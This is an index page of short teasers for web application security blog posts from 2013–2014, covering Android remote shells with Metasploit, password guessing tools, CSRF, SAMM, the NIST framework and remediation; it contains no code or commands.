Webappsec->General

B64e021126c832bb29ec9fa988155eaf

Getting a Remote Shell on an Android Device using Metasploit

February 19, 2014 Added by:Dan Dieterle

In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Comments  (0)

9fb165a9b7dfef2a9f8ac7d69b22a42c

Vertical Password Guessing Attacks Part II

February 19, 2014 Added by:Vince Kornacki

Attackers utilize a variety of tools to automate password guessing attacks, including Hydra, Nmap in conjunction with the http-form-brute script, and homegrown scripts. In this post, Vince explains how to conduct Vertical Password Guessing Attacks.

Comments  (0)

39eb20ce0f68b66e0bd72c5d1e2954fe

Vulnerabilty Remediation Tips

January 29, 2014 Added by:Krishna Raja

Discovering vulnerabilities is often the main objective of security teams within large organizations. This is achieved through initiatives such as penetration testing and source code review. But as we know, this is only the first step towards a secure organization.

Comments  (2)

022aafe7eef823af1fa3931a5539ae49

How SAMM Addresses Outsourced Development

January 28, 2014 Added by:Nima Dezhkam

Despite SAMM’s comprehensive guidelines around establishing an organization-wide security program and integrating security into in-house software development life-cycle, it does not elaborate as much on third-party vendor security and outsourced software development.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

The NIST Cyber Security Framework Completely Misses the Mark

January 06, 2014 Added by:Rohit Sethi

The NIST Cyber Security Framework completely lacks any mention of application security. We predict that organizations will likewise adopt the framework with scant attention paid to secure software, which will lull them into a false sense of security.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

CMMI for Application Security - 4 High-Impact Implementation Considerations

December 02, 2013 Added by:Rohit Sethi

Ponemon Institute and Security Innovation recently made public the results of a research study they did to get an idea of the state of application security across organizations.

Comments  (0)

54b393d8c5ad38d03c46d060fa365773

Security Advisor Alliance, A Nonprofit of Elite CISOs giving back to the community.

November 12, 2013 Added by:Jason Clark

Security Advisor Alliance is a nonprofit group of Top security leaders from the Global 1000 who have come together to donate time each week to help our peers in any area of security as a pro-bono service.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

Why Manual Testing is Worth the Extra Buck: Weighing the Pros & Cons

November 12, 2013 Added by:Rohit Sethi

Businesses often ask for guidance on whether they need to do a manual penetration test for a specific application or if automated testing suffices. Here I try to briefly describe some of the advantages and disadvantages of each method and explain our preferred approach.

Comments  (1)

219bfe49c4e7e1a3760f307bfecb9954

Security Training Program – Fixed or Customized?

November 07, 2013 Added by:Rohit Sethi

Vishal Asthana, takes a closer look at key questions to ask when implementing a software developer security training program.

Comments  (0)

514b2ac354098d84c07620f2591193b2

OWASP Vulnerability Deep Dive: CSRF

October 30, 2013 Added by:Kyle Adams

While OWASP has been around for a long time, and many security experts are aware of their top 10 web vulnerability report, I thought it would be beneficial to elaborate and share a bit more color on each one. This blog series will focus on some of the most common web attack vectors, how they are exploited, some examples, and finally how to prevent the exploit on your own applications.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

Can Software Security Requirements Yield Faster Time to Market?

October 17, 2013 Added by:Rohit Sethi

Addressing security requirements while building software is substantially faster than fixing security vulnerabilities later, and since so many organizations end up mandating fixing security defects, preventing those defects up-front yields faster time-to-market.

Comments  (0)

86d8831c7ce6fcda920aac867a984d98

Leaked Data and Credentials: Cracked Web Applications

September 25, 2013 Added by:InfoSec Institute

Changing the code behind existing web applications is a time-intensive but effective way for hackers to harvest authentication credentials and data. However, you can detect and defend against these types of attacks by using the right mix of file integrity check utilities, antivirus software, and change control policy.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

Why Remediating Assessment Results Might be Harmful to Your Business

September 11, 2013 Added by:Rohit Sethi

Let’s say you’ve just had a pen test or security scan performed on your application. You review the list of findings and get to work on remediation. Apart from obvious shortcomings of any individual single assessment technique, you may also be doing a disservice to meeting your business goals.

Comments  (0)

219bfe49c4e7e1a3760f307bfecb9954

The Three Patterns of Software Development for SDLC Security

August 30, 2013 Added by:Rohit Sethi

A one-sized fits all approach to Software Development Life Cycle (SDLC) security doesn’t work. Practitioners often find that development teams all have different processes – many seem they are special snowflakes, rejecting a single SDLC security program.

Comments  (4)

98180f2c2934cab169b73cb01b6d7587

Cyber Security and Terrorism – See Something, Say Something

August 08, 2013 Added by:Jon Stout

he existing cyber security computing model of the past decade, based on firewalls, anti-viral services, intrusion detection controls, etc., is no longer adequate to help organizations mitigate cyber-security risk.

Comments  (0)

98180f2c2934cab169b73cb01b6d7587

Cyber Security – Is Offensive Cyber Security Necessary?

July 31, 2013 Added by:Jon Stout

The country is at war and it is a cyber security war. The enemies are many, diverse and competent and fighting a defensive war is not the best way to win. Cyber security war is like any other war- taking the offensive will improve your chances of success. Like any other war, the cyber security war requires proper planning for success and a total winning strategy. Half hearted measures will not ...

Comments  (0)

Page « < 1 - 2 - 3 - 4 - 5 > »